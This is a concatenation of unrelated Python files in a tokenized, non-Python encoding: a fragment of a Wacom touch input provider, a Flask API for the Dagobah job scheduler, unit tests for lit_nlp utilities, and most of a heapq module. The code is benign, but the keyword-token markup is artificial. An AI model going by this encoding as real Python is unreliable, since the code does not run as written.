range_max_position_y)<if_stmt>invert_y<block_start>val=1.-val<block_end>touch_y=val<line_sep>changed=<true><block_end><elif_stmt>ev_type<eq>EV_ABS<and>ev_code<eq>ABS_PRESSURE<block_start>touch_pressure=normalize(ev_value range_min_pressure range_max_pressure)<line_sep>changed=<true><block_end><elif_stmt>ev_type<eq>EV_ABS<and>ev_code<eq>ABS_MISC<block_start><if_stmt>ev_value<eq>0<block_start>reset_touch=<true><block_end><block_end><block_end><block_end><block_end><def_stmt>update self dispatch_fn# dispatch all event from threads <block_start><try_stmt><block_start><while_stmt><true><block_start>event_type,touch=self.queue.popleft()<line_sep>dispatch_fn(event_type touch)<block_end><block_end><except_stmt><block_start><pass><block_end><block_end><block_end>MotionEventFactory.register('linuxwacom' LinuxWacomMotionEventProvider)<block_end>
""" HTTP API methods for Dagobah daemon. """<import_stmt>StringIO<import_stmt>json<import_from_stmt>flask request abort send_file<import_from_stmt>flask_login login_required<import_from_stmt>.daemon app<import_from_stmt>.util validate_dict api_call allowed_file<line_sep>dagobah=app.config['dagobah']<line_sep>@app.route('/api/jobs' methods=['GET'])@login_required@api_call<def_stmt>get_jobs <block_start><return>dagobah._serialize().get('jobs' {})<block_end>@app.route('/api/job' methods=['GET'])@login_required@api_call<def_stmt>get_job <block_start>args=dict(request.args)<if_stmt><not>validate_dict(args required=['job_name'] job_name=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<if_stmt><not>job<block_start>abort(400)<block_end><return>job._serialize()<block_end>@app.route('/api/logs' methods=['GET'])@login_required@api_call<def_stmt>get_run_log_history <block_start>args=dict(request.args)<if_stmt><not>validate_dict(args required=['job_name' 'task_name'] job_name=str task_name=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>task=job.tasks.get(args['task_name'] <none>)<if_stmt><not>task<block_start>abort(400)<block_end><return>task.get_run_log_history()<block_end>@app.route('/api/log' methods=['GET'])@login_required@api_call<def_stmt>get_log <block_start>args=dict(request.args)<if_stmt><not>validate_dict(args required=['job_name' 'task_name' 'log_id'] job_name=str task_name=str log_id=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>task=job.tasks.get(args['task_name'] <none>)<if_stmt><not>task<block_start>abort(400)<block_end><return>task.get_run_log(args['log_id'])<block_end>@app.route('/api/head' methods=['GET'])@login_required@api_call<def_stmt>head_task <block_start>args=dict(request.args)<if_stmt><not>validate_dict(args required=['job_name' 'task_name'] job_name=str task_name=str stream=str 
num_lines=int)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>task=job.tasks.get(args['task_name'] <none>)<if_stmt><not>task<block_start>abort(400)<block_end>call_args={}<for_stmt>key ['stream' 'num_lines']<block_start><if_stmt>key<in>args<block_start>call_args[key]=args[key]<block_end><block_end><return>task.head(**call_args)<block_end>@app.route('/api/tail' methods=['GET'])@login_required@api_call<def_stmt>tail_task <block_start>args=dict(request.args)<if_stmt><not>validate_dict(args required=['job_name' 'task_name'] job_name=str task_name=str stream=str num_lines=int)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>task=job.tasks.get(args['task_name'] <none>)<if_stmt><not>task<block_start>abort(400)<block_end>call_args={}<for_stmt>key ['stream' 'num_lines']<block_start><if_stmt>key<in>args<block_start>call_args[key]=args[key]<block_end><block_end><return>task.tail(**call_args)<block_end>@app.route('/api/add_job' methods=['POST'])@login_required@api_call<def_stmt>add_job <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name'] job_name=str)<block_start>abort(400)<block_end>dagobah.add_job(args['job_name'])<block_end>@app.route('/api/delete_job' methods=['POST'])@login_required@api_call<def_stmt>delete_job <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name'] job_name=str)<block_start>abort(400)<block_end>dagobah.delete_job(args['job_name'])<block_end>@app.route('/api/start_job' methods=['POST'])@login_required@api_call<def_stmt>start_job <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name'] job_name=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>job.start()<block_end>@app.route('/api/retry_job' methods=['POST'])@login_required@api_call<def_stmt>retry_job <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name'] 
job_name=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>job.retry()<block_end>@app.route('/api/add_task_to_job' methods=['POST'])@login_required@api_call<def_stmt>add_task_to_job <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name' 'task_command' 'task_name'] job_name=str task_command=str task_name=str task_target=str)<block_start>abort(400)<block_end>dagobah.add_task_to_job(args['job_name'] args['task_command'] args['task_name'] hostname=args.get("task_target" <none>))<block_end>@app.route('/api/delete_task' methods=['POST'])@login_required@api_call<def_stmt>delete_task <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name' 'task_name'] job_name=str task_name=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>job.delete_task(args['task_name'])<block_end>@app.route('/api/add_dependency' methods=['POST'])@login_required@api_call<def_stmt>add_dependency <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name' 'from_task_name' 'to_task_name'] job_name=str from_task_name=str to_task_name=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>job.add_dependency(args['from_task_name'] args['to_task_name'])<block_end>@app.route('/api/delete_dependency' methods=['POST'])@login_required@api_call<def_stmt>delete_dependency <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name' 'from_task_name' 'to_task_name'] job_name=str from_task_name=str to_task_name=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>job.delete_dependency(args['from_task_name'] args['to_task_name'])<block_end>@app.route('/api/schedule_job' methods=['POST'])@login_required@api_call<def_stmt>schedule_job <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name' 'cron_schedule'] job_name=str 
cron_schedule=str)<block_start>abort(400)<block_end><if_stmt>args['cron_schedule']<eq>''<block_start>args['cron_schedule']=<none><block_end>job=dagobah.get_job(args['job_name'])<line_sep>job.schedule(args['cron_schedule'])<block_end>@app.route('/api/stop_scheduler' methods=['POST'])@login_required@api_call<def_stmt>stop_scheduler <block_start>dagobah.scheduler.stop()<block_end>@app.route('/api/restart_scheduler' methods=['POST'])@login_required@api_call<def_stmt>restart_scheduler <block_start>dagobah.scheduler.restart()<block_end>@app.route('/api/terminate_all_tasks' methods=['POST'])@login_required@api_call<def_stmt>terminate_all_tasks <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name'] job_name=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>job.terminate_all()<block_end>@app.route('/api/kill_all_tasks' methods=['POST'])@login_required@api_call<def_stmt>kill_all_tasks <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name'] job_name=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>job.kill_all()<block_end>@app.route('/api/terminate_task' methods=['POST'])@login_required@api_call<def_stmt>terminate_task <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name' 'task_name'] job_name=str task_name=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>task=job.tasks.get(args['task_name'] <none>)<if_stmt><not>task<block_start>abort(400)<block_end>task.terminate()<block_end>@app.route('/api/kill_task' methods=['POST'])@login_required@api_call<def_stmt>kill_task <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name' 'task_name'] job_name=str task_name=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>task=job.tasks.get(args['task_name'] 
<none>)<if_stmt><not>task<block_start>abort(400)<block_end>task.kill()<block_end>@app.route('/api/edit_job' methods=['POST'])@login_required@api_call<def_stmt>edit_job <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name'] job_name=str name=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<del_stmt>args['job_name']<line_sep>job.edit(**args)<block_end>@app.route('/api/update_job_notes' methods=['POST'])@login_required@api_call<def_stmt>update_job_notes <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name' 'notes'] job_name=str notes=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>job.update_job_notes(args['notes'])<block_end>@app.route('/api/edit_task' methods=['POST'])@login_required@api_call<def_stmt>edit_task <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name' 'task_name'] job_name=str task_name=str name=str command=str soft_timeout=int hard_timeout=int hostname=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>task=job.tasks.get(args['task_name'] <none>)<if_stmt><not>task<block_start>abort(400)<block_end># validate host <if_stmt>'hostname'<in>args<and>args.get('hostname')<not><in>dagobah.get_hosts()# Check for empty host, if so then task is no longer remote <block_start><if_stmt><not>args.get('hostname')<block_start>args['hostname']=<none><block_end><else_stmt><block_start>abort(400)<block_end><block_end><del_stmt>args['job_name']<del_stmt>args['task_name']<line_sep>job.edit_task(task.name **args)<block_end>@app.route('/api/set_soft_timeout' methods=['POST'])@login_required@api_call<def_stmt>set_soft_timeout <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name' 'task_name' 'soft_timeout'] job_name=str task_name=str 
soft_timeout=int)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>task=job.tasks.get(args['task_name'] <none>)<if_stmt><not>task<block_start>abort(400)<block_end>task.set_soft_timeout(args['soft_timeout'])<block_end>@app.route('/api/set_hard_timeout' methods=['POST'])@login_required@api_call<def_stmt>set_hard_timeout <block_start>args=dict(request.form)<if_stmt><not>validate_dict(args required=['job_name' 'task_name' 'hard_timeout'] job_name=str task_name=str hard_timeout=int)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>task=job.tasks.get(args['task_name'] <none>)<if_stmt><not>task<block_start>abort(400)<block_end>task.set_hard_timeout(args['hard_timeout'])<block_end>@app.route('/api/export_job' methods=['GET'])@login_required<def_stmt>export_job <block_start>args=dict(request.args)<if_stmt><not>validate_dict(args required=['job_name'] job_name=str)<block_start>abort(400)<block_end>job=dagobah.get_job(args['job_name'])<line_sep>to_send=StringIO.StringIO()<line_sep>to_send.write(json.dumps(job._serialize(strict_json=<true>)))<line_sep>to_send.write('\n')<line_sep>to_send.seek(0)<line_sep><return>send_file(to_send attachment_filename='%s.json'%job.name as_attachment=<true>)<block_end>@app.route('/api/import_job' methods=['POST'])@login_required@api_call<def_stmt>import_job <block_start>file=request.files['file']<if_stmt>(file<and>allowed_file(file.filename ['json']))<block_start>dagobah.add_job_from_json(file.read() destructive=<true>)<block_end><block_end>@app.route('/api/hosts' methods=['GET'])@login_required@api_call<def_stmt>get_hosts <block_start><return>dagobah.get_hosts()<block_end>
# Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== # Lint as: python3 """Tests for lit_nlp.lib.utils."""<import_from_stmt>absl.testing absltest<import_from_stmt>lit_nlp.api types<import_from_stmt>lit_nlp.lib utils<class_stmt>UtilsTest(absltest.TestCase)<block_start><def_stmt>test_coerce_bool self<block_start>self.assertTrue(utils.coerce_bool(<true>))<line_sep>self.assertTrue(utils.coerce_bool(1))<line_sep>self.assertTrue(utils.coerce_bool(2.2))<line_sep>self.assertTrue(utils.coerce_bool(<true>))<line_sep>self.assertTrue(utils.coerce_bool([0]))<line_sep>self.assertTrue(utils.coerce_bool({"a":"hi"}))<line_sep>self.assertTrue(utils.coerce_bool("this is true"))<line_sep>self.assertFalse(utils.coerce_bool(""))<line_sep>self.assertFalse(utils.coerce_bool(0))<line_sep>self.assertFalse(utils.coerce_bool("0"))<line_sep>self.assertFalse(utils.coerce_bool(<false>))<line_sep>self.assertFalse(utils.coerce_bool("false"))<line_sep>self.assertFalse(utils.coerce_bool("False"))<line_sep>self.assertFalse(utils.coerce_bool({}))<line_sep>self.assertFalse(utils.coerce_bool([]))<block_end><def_stmt>test_find_keys self<block_start>d={"a":<true> "b":<false> "c":<true>}<line_sep>self.assertEqual(["a" "c"] utils.find_keys(d <lambda>a:a))<line_sep>self.assertEqual([] utils.find_keys(d <lambda>a:a<eq>"nothing"))<line_sep>self.assertEqual([] utils.find_keys({} 
<lambda>a:a))<block_end><def_stmt>test_find_spec_keys self<block_start>spec={"score":types.RegressionScore() "scalar_foo":types.Scalar() "text":types.TextSegment() "emb_0":types.Embeddings() "emb_1":types.Embeddings() "tokens":types.Tokens() "generated_text":types.GeneratedText() }<line_sep>self.assertEqual(["score"] utils.find_spec_keys(spec types.RegressionScore))<line_sep>self.assertEqual(["text" "tokens" "generated_text"] utils.find_spec_keys(spec (types.TextSegment types.Tokens)))<line_sep>self.assertEqual(["emb_0" "emb_1"] utils.find_spec_keys(spec types.Embeddings))<line_sep>self.assertEqual([] utils.find_spec_keys(spec types.AttentionHeads))<line_sep># Check subclasses self.assertEqual(list(spec.keys()) utils.find_spec_keys(spec types.LitType))<line_sep>self.assertEqual(["text" "generated_text"] utils.find_spec_keys(spec types.TextSegment))<line_sep>self.assertEqual(["score" "scalar_foo"] utils.find_spec_keys(spec types.Scalar))<block_end><def_stmt>test_filter_by_keys self<block_start>pred=<lambda>k:k<eq>"a"<or>k<eq>"b"<line_sep>d={"a":<true> "b":<false> "c":<true>}<line_sep>self.assertDictEqual({"a":<true> "b":<false>} utils.filter_by_keys(d pred))<line_sep>d2={"1":<true> "2":<false> "3":<true>}<line_sep>self.assertDictEqual({} utils.filter_by_keys(d2 pred))<line_sep>self.assertDictEqual({} utils.filter_by_keys({} pred))<block_end><def_stmt>test_copy_and_update self<block_start>d={"a":<true> "b":<false> "c":<true>}<line_sep>update={"a":<false> "b":<true>}<line_sep>expected={"a":<false> "b":<true> "c":<true>}<line_sep>self.assertDictEqual(expected utils.copy_and_update(d update))<line_sep>d={"a":<true> "b":<false> }<line_sep>update={"a":<false> "c":<true>}<line_sep>expected={"a":<false> "b":<false> "c":<true>}<line_sep>self.assertDictEqual(expected utils.copy_and_update(d update))<line_sep>d={"a":<true> "b":<false> }<line_sep>update={}<line_sep>self.assertDictEqual(d utils.copy_and_update(d update))<line_sep>d={}<line_sep>update={"a":<false> 
"c":<true>}<line_sep>self.assertDictEqual(update utils.copy_and_update(d update))<block_end><def_stmt>test_remap_dict self<block_start>d={"a":<true> "b":<false> "c":<true>}<line_sep>remap_dict={"a":"a2" "b":"b2"}<line_sep>expected={"a2":<true> "b2":<false> "c":<true>}<line_sep>self.assertDictEqual(expected utils.remap_dict(d remap_dict))<line_sep>d={"a":<true> "b":<false> "c":<true>}<line_sep>remap_dict={}<line_sep>self.assertDictEqual(d utils.remap_dict(d remap_dict))<line_sep>d={}<line_sep>remap_dict={"a":"a2" "b":"b2"}<line_sep>self.assertDictEqual(d utils.remap_dict(d remap_dict))<line_sep>d={"a":<true> "b":<false> "c":<true>}<line_sep>remap_dict={"a":"b" }<line_sep>expected={"b":<false> "c":<true>}<line_sep>self.assertDictEqual(expected utils.remap_dict(d remap_dict))<block_end><def_stmt>test_find_all_combinations self<block_start>l=[1 2 3 4]<line_sep>combinations=utils.find_all_combinations(l min_element_count=2 max_element_count=3)<line_sep>expected=[[1 2] [1 3] [1 4] [2 3] [2 4] [3 4] [1 2 3] [1 2 4] [1 3 4] [2 3 4]]<line_sep>self.assertListEqual(combinations expected)<block_end><def_stmt>test_find_all_combinations_max_is_greater_than_len self<block_start>l=[1 2 3 4]<line_sep>combinations=utils.find_all_combinations(l min_element_count=2 max_element_count=10)<line_sep>expected=[[1 2] [1 3] [1 4] [2 3] [2 4] [3 4] [1 2 3] [1 2 4] [1 3 4] [2 3 4] [1 2 3 4]]<line_sep>self.assertListEqual(combinations expected)<block_end><def_stmt>test_find_all_combinations_min_is_greater_than_max self<block_start>l=[1 2 3 4]<line_sep>combinations=utils.find_all_combinations(l min_element_count=3 max_element_count=2)<line_sep>expected=[]<line_sep>self.assertListEqual(combinations expected)<block_end><def_stmt>test_find_all_combinations_min_is_negative self<block_start>l=[1 2 3 4]<line_sep>combinations=utils.find_all_combinations(l min_element_count=-1 max_element_count=2)<line_sep>expected=[[1] [2] [3] [4] [1 2] [1 3] [1 4] [2 3] [2 4] [3 
4]]<line_sep>self.assertListEqual(combinations expected)<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>absltest.main()<block_end>
"""Heap queue algorithm (a.k.a. priority queue). Heaps are arrays for which a[k] <= a[2*k+1] and a[k] <= a[2*k+2] for all k, counting elements from 0. For the sake of comparison, non-existing elements are considered to be infinite. The interesting property of a heap is that a[0] is always its smallest element. Usage: heap = [] # creates an empty heap heappush(heap, item) # pushes a new item on the heap item = heappop(heap) # pops the smallest item from the heap item = heap[0] # smallest item on the heap without popping it heapify(x) # transforms list into a heap, in-place, in linear time item = heapreplace(heap, item) # pops and returns smallest item, and adds # new item; the heap size is unchanged Our API differs from textbook heap algorithms as follows: - We use 0-based indexing. This makes the relationship between the index for a node and the indexes for its children slightly less obvious, but is more suitable since Python uses 0-based indexing. - Our heappop() method returns the smallest item, not the largest. These two make it possible to view the heap as a regular Python list without surprises: heap[0] is the smallest item, and heap.sort() maintains the heap invariant! """<line_sep># Original code by <NAME>, augmented by <NAME> and <NAME> __about__="""Heap queues [explanation by <NAME>] Heaps are arrays for which a[k] <= a[2*k+1] and a[k] <= a[2*k+2] for all k, counting elements from 0. For the sake of comparison, non-existing elements are considered to be infinite. The interesting property of a heap is that a[0] is always its smallest element. The strange invariant above is meant to be an efficient memory representation for a tournament. The numbers below are `k', not a[k]: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 In the tree above, each cell `k' is topping `2*k+1' and `2*k+2'. 
In an usual binary tournament we see in sports, each cell is the winner over the two cells it tops, and we can trace the winner down the tree to see all opponents s/he had. However, in many computer applications of such tournaments, we do not need to trace the history of a winner. To be more memory efficient, when a winner is promoted, we try to replace it by something else at a lower level, and the rule becomes that a cell and the two cells it tops contain three different items, but the top cell "wins" over the two topped cells. If this heap invariant is protected at all time, index 0 is clearly the overall winner. The simplest algorithmic way to remove it and find the "next" winner is to move some loser (let's say cell 30 in the diagram above) into the 0 position, and then percolate this new 0 down the tree, exchanging values, until the invariant is re-established. This is clearly logarithmic on the total number of items in the tree. By iterating over all items, you get an O(n ln n) sort. A nice feature of this sort is that you can efficiently insert new items while the sort is going on, provided that the inserted items are not "better" than the last 0'th element you extracted. This is especially useful in simulation contexts, where the tree holds all incoming events, and the "win" condition means the smallest scheduled time. When an event schedule other events for execution, they are scheduled into the future, so they can easily go into the heap. So, a heap is a good structure for implementing schedulers (this is what I used for my MIDI sequencer :-). Various structures for implementing schedulers have been extensively studied, and heaps are good for this, as they are reasonably speedy, the speed is almost constant, and the worst case is not much different than the average case. However, there are other representations which are more efficient overall, yet the worst cases might be terrible. Heaps are also very useful in big disk sorts. 
You most probably all know that a big sort implies producing "runs" (which are pre-sorted sequences, which size is usually related to the amount of CPU memory), followed by a merging passes for these runs, which merging is often very cleverly organised[1]. It is very important that the initial sort produces the longest runs possible. Tournaments are a good way to that. If, using all the memory available to hold a tournament, you replace and percolate items that happen to fit the current run, you'll produce runs which are twice the size of the memory for random input, and much better for input fuzzily ordered. Moreover, if you output the 0'th item on disk and get an input which may not fit in the current tournament (because the value "wins" over the last output value), it cannot fit in the heap, so the size of the heap decreases. The freed memory could be cleverly reused immediately for progressively building a second heap, which grows at exactly the same rate the first heap is melting. When the first heap completely vanishes, you switch heaps and start a new run. Clever and quite effective! In a word, heaps are useful memory structures to know. I use them in a few applications, and I think it is good to keep a `heap' module around. :-) -------------------- [1] The disk balancing algorithms which are current, nowadays, are more annoying than clever, and this is a consequence of the seeking capabilities of the disks. On devices which cannot seek, like big tape drives, the story was quite different, and one had to be very clever to ensure (far in advance) that each tape movement will be the most effective possible (that is, will best participate at "progressing" the merge). Some tapes were even able to read backwards, and this was also used to avoid the rewinding time. Believe me, real good tape sorts were quite spectacular to watch! From all times, sorting has always been a Great Art! 
:-) """<line_sep>__all__=['heappush' 'heappop' 'heapify' 'heapreplace' 'merge' 'nlargest' 'nsmallest' 'heappushpop']<def_stmt>heappush heap item<block_start>"""Push item onto heap, maintaining the heap invariant."""<line_sep>heap.append(item)<line_sep>_siftdown(heap 0 len(heap)-1)<block_end><def_stmt>heappop heap<block_start>"""Pop the smallest item off the heap, maintaining the heap invariant."""<line_sep>lastelt=heap.pop()# raises appropriate IndexError if heap is empty <if_stmt>heap<block_start>returnitem=heap[0]<line_sep>heap[0]=lastelt<line_sep>_siftup(heap 0)<line_sep><return>returnitem<block_end><return>lastelt<block_end><def_stmt>heapreplace heap item<block_start>"""Pop and return the current smallest value, and add the new item. This is more efficient than heappop() followed by heappush(), and can be more appropriate when using a fixed-size heap. Note that the value returned may be larger than item! That constrains reasonable uses of this routine unless written as part of a conditional replacement: if item > heap[0]: item = heapreplace(heap, item) """<line_sep>returnitem=heap[0]# raises appropriate IndexError if heap is empty heap[0]=item<line_sep>_siftup(heap 0)<line_sep><return>returnitem<block_end><def_stmt>heappushpop heap item<block_start>"""Fast version of a heappush followed by a heappop."""<if_stmt>heap<and>heap[0]<l>item<block_start>item,heap[0]=heap[0] item<line_sep>_siftup(heap 0)<block_end><return>item<block_end><def_stmt>heapify x<block_start>"""Transform list into a heap, in-place, in O(len(x)) time."""<line_sep>n=len(x)<line_sep># Transform bottom-up. The largest index there's any point to looking at # is the largest with a child index in-range, so must have 2*i + 1 < n, # or i < (n-1)/2. If n is even = 2*j, this is (2*j-1)/2 = j-1/2 so # j-1 is the largest, which is n//2 - 1. If n is odd = 2*j+1, this is # (2*j+1-1)/2 = j so j-1 is the largest, and that's again n//2-1. 
<for_stmt>i reversed(range(n<floordiv>2))<block_start>_siftup(x i)<block_end><block_end><def_stmt>_heappop_max heap<block_start>"""Maxheap version of a heappop."""<line_sep>lastelt=heap.pop()# raises appropriate IndexError if heap is empty <if_stmt>heap<block_start>returnitem=heap[0]<line_sep>heap[0]=lastelt<line_sep>_siftup_max(heap 0)<line_sep><return>returnitem<block_end><return>lastelt<block_end><def_stmt>_heapreplace_max heap item<block_start>"""Maxheap version of a heappop followed by a heappush."""<line_sep>returnitem=heap[0]# raises appropriate IndexError if heap is empty heap[0]=item<line_sep>_siftup_max(heap 0)<line_sep><return>returnitem<block_end><def_stmt>_heapify_max x<block_start>"""Transform list into a maxheap, in-place, in O(len(x)) time."""<line_sep>n=len(x)<for_stmt>i reversed(range(n<floordiv>2))<block_start>_siftup_max(x i)<block_end><block_end># 'heap' is a heap at all indices >= startpos, except possibly for pos. pos # is the index of a leaf with a possibly out-of-order value. Restore the # heap invariant. <def_stmt>_siftdown heap startpos pos<block_start>newitem=heap[pos]<line_sep># Follow the path to the root, moving parents down until finding a place # newitem fits. <while_stmt>pos<g>startpos<block_start>parentpos=(pos-1)<rshift>1<line_sep>parent=heap[parentpos]<if_stmt>newitem<l>parent<block_start>heap[pos]=parent<line_sep>pos=parentpos<line_sep><continue><block_end><break><block_end>heap[pos]=newitem<block_end># The child indices of heap index pos are already heaps, and we want to make # a heap at index pos too. We do this by bubbling the smaller child of # pos up (and so on with that child's children, etc) until hitting a leaf, # then using _siftdown to move the oddball originally at index pos into place. # # We *could* break out of the loop as soon as we find a pos where newitem <= # both its children, but turns out that's not a good idea, and despite that # many books write the algorithm that way. 
# The child indices of heap index pos are already heaps, and we want to make
# a heap at index pos too.  We do this by bubbling the smaller child of
# pos up (and so on with that child's children, etc) until hitting a leaf,
# then using _siftdown to move the oddball originally at index pos into place.
#
# Sifting to a leaf and back up makes fewer comparisons in practice than
# stopping early: during a heap pop the sifted-in element is the last array
# element and tends to be large, so comparing it against values near the
# root usually doesn't exit the loop early.  See Knuth, Volume 3, where this
# is explained and quantified in an exercise.  Cutting comparisons matters
# because the priority may live in a custom __lt__ or (priority, record)
# tuples, making each comparison potentially expensive.
def _siftup(heap, pos):
    endpos = len(heap)
    startpos = pos
    newitem = heap[pos]
    # Bubble up the smaller child until hitting a leaf.
    childpos = 2*pos + 1    # leftmost child position
    while childpos < endpos:
        # Set childpos to index of smaller child.
        rightpos = childpos + 1
        if rightpos < endpos and not heap[childpos] < heap[rightpos]:
            childpos = rightpos
        # Move the smaller child up.
        heap[pos] = heap[childpos]
        pos = childpos
        childpos = 2*pos + 1
    # The leaf at pos is empty now.  Put newitem there, and bubble it up
    # to its final resting place (by sifting its parents down).
    heap[pos] = newitem
    _siftdown(heap, startpos, pos)


def _siftdown_max(heap, startpos, pos):
    'Maxheap variant of _siftdown'
    newitem = heap[pos]
    # Follow the path to the root, moving parents down until finding a place
    # newitem fits.
    while pos > startpos:
        parentpos = (pos - 1) >> 1
        parent = heap[parentpos]
        if parent < newitem:
            heap[pos] = parent
            pos = parentpos
            continue
        break
    heap[pos] = newitem


def _siftup_max(heap, pos):
    'Maxheap variant of _siftup'
    endpos = len(heap)
    startpos = pos
    newitem = heap[pos]
    # Bubble up the larger child until hitting a leaf.
    childpos = 2*pos + 1    # leftmost child position
    while childpos < endpos:
        # Set childpos to index of larger child.
        rightpos = childpos + 1
        if rightpos < endpos and not heap[rightpos] < heap[childpos]:
            childpos = rightpos
        # Move the larger child up.
        heap[pos] = heap[childpos]
        pos = childpos
        childpos = 2*pos + 1
    # The leaf at pos is empty now.  Put newitem there, and bubble it up
    # to its final resting place (by sifting its parents down).
    heap[pos] = newitem
    _siftdown_max(heap, startpos, pos)


def merge(*iterables, key=None, reverse=False):
    '''Merge multiple sorted inputs into a single sorted output.

    Similar to sorted(itertools.chain(*iterables)) but returns a generator,
    does not pull the data into memory all at once, and assumes that each of
    the input streams is already sorted (smallest to largest).

    >>> list(merge([1,3,5,7], [0,2,4,8], [5,10,15,20], [], [25]))
    [0, 1, 2, 3, 4, 5, 5, 7, 8, 10, 15, 20, 25]

    If *key* is not None, applies a key function to each element to
    determine its sort order.

    >>> list(merge(['dog', 'horse'], ['cat', 'fish', 'kangaroo'], key=len))
    ['dog', 'cat', 'fish', 'horse', 'kangaroo']

    '''
    h = []
    h_append = h.append

    # reverse=True merges largest-to-smallest inputs using the maxheap
    # primitives; 'direction' keeps the per-iterable order field a tie-break
    # that preserves stability in both directions.
    if reverse:
        _heapify = _heapify_max
        _heappop = _heappop_max
        _heapreplace = _heapreplace_max
        direction = -1
    else:
        _heapify = heapify
        _heappop = heappop
        _heapreplace = heapreplace
        direction = 1

    if key is None:
        # Heap entries are mutable lists [value, order, next-bound-method]
        # so the top entry can be updated in place before heapreplace.
        for order, it in enumerate(map(iter, iterables)):
            try:
                next = it.__next__
                h_append([next(), order * direction, next])
            except StopIteration:
                pass
        _heapify(h)
        while len(h) > 1:
            try:
                while True:
                    value, order, next = s = h[0]
                    yield value
                    s[0] = next()           # raises StopIteration when exhausted
                    _heapreplace(h, s)      # restore heap condition
            except StopIteration:
                _heappop(h)                 # remove empty iterator
        if h:
            # fast case when only a single iterator remains
            value, order, next = h[0]
            yield value
            yield from next.__self__
        return

    # Keyed variant: entries carry the decorated key as element 0 so the heap
    # compares keys, with the raw value kept alongside at element 2.
    for order, it in enumerate(map(iter, iterables)):
        try:
            next = it.__next__
            value = next()
            h_append([key(value), order * direction, value, next])
        except StopIteration:
            pass
    _heapify(h)
    while len(h) > 1:
        try:
            while True:
                key_value, order, value, next = s = h[0]
                yield value
                value = next()
                s[0] = key(value)
                s[2] = value
                _heapreplace(h, s)
        except StopIteration:
            _heappop(h)
    if h:
        key_value, order, value, next = h[0]
        yield value
        yield from next.__self__

# Algorithm notes for nlargest() and nsmallest(): make a single pass over the
# data while keeping the k most extreme values in a size-k heap, so memory is
# bounded by k and comparisons approach n for k << n.
# nsmallest()/nlargest(): one pass over the data keeping the k most extreme
# values in a size-k heap.  On random input this needs roughly
# n + k*(log2(k)*log(n/k) + log2(k) + log(n/k)) comparisons — only slightly
# more than min()/max() for small k and large n — while alternatives either
# need more memory, multiple passes, or more comparisons in common cases.


def nsmallest(n, iterable, key=None):
    """Find the n smallest elements in a dataset.

    Equivalent to:  sorted(iterable, key=key)[:n]
    """
    # A single winner degenerates to min(); the sentinel object marks
    # "input was empty" so [] can be returned instead of raising.
    if n == 1:
        it = iter(iterable)
        sentinel = object()
        if key is None:
            winner = min(it, default=sentinel)
        else:
            winner = min(it, default=sentinel, key=key)
        return [] if winner is sentinel else [winner]

    # If the input size is known and n covers all of it, sorted() is faster.
    try:
        size = len(iterable)
    except (TypeError, AttributeError):
        pass
    else:
        if n >= size:
            return sorted(iterable, key=key)[:n]

    it = iter(iterable)
    if key is None:
        # Undecorated path: keep (value, insertion_order) pairs in a maxheap
        # of size n.  The order field breaks ties so equal values never get
        # compared beyond '<', and putting range(n) first stops zip() from
        # consuming one element too many from the iterator.
        best = [(value, i) for i, value in zip(range(n), it)]
        if not best:
            return best
        _heapify_max(best)
        bound = best[0][0]
        tiebreak = n
        replace = _heapreplace_max
        for value in it:
            if value < bound:
                replace(best, (value, tiebreak))
                bound = best[0][0]
                tiebreak += 1
        best.sort()
        return [pair[0] for pair in best]

    # Decorated path: (key(value), insertion_order, value) triples so the
    # heap compares precomputed keys instead of calling key() repeatedly.
